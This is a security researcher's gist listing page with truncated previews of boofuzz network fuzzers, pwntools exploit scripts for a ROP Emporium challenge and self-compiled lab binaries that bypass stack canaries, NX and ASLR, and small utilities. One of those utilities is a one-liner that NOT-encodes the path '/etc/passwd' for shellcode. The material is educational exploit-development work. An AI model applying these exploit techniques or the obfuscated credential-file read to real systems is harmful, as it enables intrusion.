Manuel Mancera Sinkmanu

Sinkmanu / booSSH.py
Last active March 12, 2021 12:07
Fuzzing SSH Key exchange begins
from boofuzz import *
import sys
# Target host and TCP port are taken positionally from the command line
# (argv[1] = host, argv[2] = port); a missing/non-numeric port raises here.
host, port = sys.argv[1], int(sys.argv[2])
#def banner(target, fuzz_data_logger, session, *args, **kwargs):
# target.send(b"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\x0d\x0a")
# data = target.recv(1024)
# print("RECV: %s" % str(data))
Sinkmanu / booHTTP.py
Created January 18, 2021 14:24
Basic HTTP fuzzer (with boofuzz)
from boofuzz import *
import sys
# Target host and TCP port from the command line (argv[1] = host, argv[2] = port).
host, port = sys.argv[1], int(sys.argv[2])
# One boofuzz session driving a plain socket connection to the target.
session = Session(
    target=Target(SocketConnection(host, int(port))),
)
# Root of the request definition; the blocks that follow add its fields.
s_initialize(name="request")
with s_block("verb"):
Sinkmanu / emporium-write4.py
Created May 15, 2019 12:42
Exploit for write4 challenge of https://ropemporium.com/
#!/usr/bin/env python
from pwn import *
# pwntools context for a 64-bit Linux target (equivalent to
# context(arch='amd64', os='linux'); each assignment goes through the same setter).
context.arch = 'amd64'
context.os = 'linux'
# Load the challenge binary and spawn it as a local process.
elf = ELF("./write4")
p = process(elf.path)
#p = gdb.debug("/home/manu/Challenges/write4", '''
#break main
Sinkmanu / scrapy-skeleton.py
Created March 15, 2019 07:00
Python scrapy skeleton
import requests
from bs4 import BeautifulSoup
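# Browser-like User-Agent header sent with the request.
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' }
# Fetch the page ("url" is a placeholder). TLS certificate verification is left
# at the requests default (on): verify=False accepts any certificate and lets an
# on-path party read or alter the response. For a host behind a private CA,
# pass verify=<path to that CA bundle> instead of disabling the check.
# A timeout is set so a silent server cannot hang the script indefinitely.
r = requests.get("url", headers=user_agent, timeout=30)
# Parse the HTML body with the lenient html5lib backend.
soup = BeautifulSoup(r.text, "html5lib")
# Function-call form prints the same thing under Python 2 and Python 3.
print(soup.find_all('a'))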
Sinkmanu / exploit.py
Created May 29, 2018 08:20
Ret2mprotect - bypassing stack canary, NX and ASLR.
from pwn import *
'''
// File: bypass-protections.c
// gcc bypass-protections.c -o bypass-protections
#include <stdio.h>
#include <stdlib.h>
Sinkmanu / exploit-pi.py
Last active May 24, 2018 16:33
Ret2libc on raspberry pi exploit
from pwn import *
'''
// Raspberry pi:
// File: leak.c
// gcc leak.c -o leak
// socat -v tcp-listen:4444,reuseaddr,fork exec:"./leak"
#include <stdio.h>
Sinkmanu / exploit.py
Created May 24, 2018 08:11
Easy exploit to bypass canary, ASLR and NX
from pwn import *
'''
// File: leak.c
// gcc leak.c -o leak
#include <stdio.h>
int main(int argc, char *argv[]){
char buff[64];
Sinkmanu / exploit-canary.py
Created May 22, 2018 12:55
Exploit with stack guard bypass
from pwn import *
'''
// File: bypass-canary.c
// $ gcc bypass-canary.c -o bypass-canary
#include <stdio.h>
#include <stdlib.h>
Sinkmanu / srec-checksum.py
Created March 14, 2018 11:26
S-record checksum calculator
#!/usr/bin/env python
# usage: $ ./srec-checksum.py <s-record without checksum>
import sys
# The S-record text to checksum, taken from the command line without its checksum byte.
cad = sys.argv[1]
# Scanning starts at offset 2 — presumably skipping the leading "S" and the
# record-type digit, which the checksum does not cover; the running sum starts at 0.
i, checksum = 2, 0
while i<len(cad):
Sinkmanu / not-encoder.sh
Created October 12, 2017 11:20
Encode a string with bitwise NOT
# Prints each byte of the string as comma-separated hex after a bitwise NOT
# (ctypes.c_uint8(~ord(c)) keeps the result in the 0..255 range).
$ echo -e 'import ctypes\nimport sys\nf="/etc/passwd"\nfor i in f:\n\tsys.stdout.write(hex(ctypes.c_uint8(~ord(i)).value)+",")\nsys.stdout.write("\\n")' | python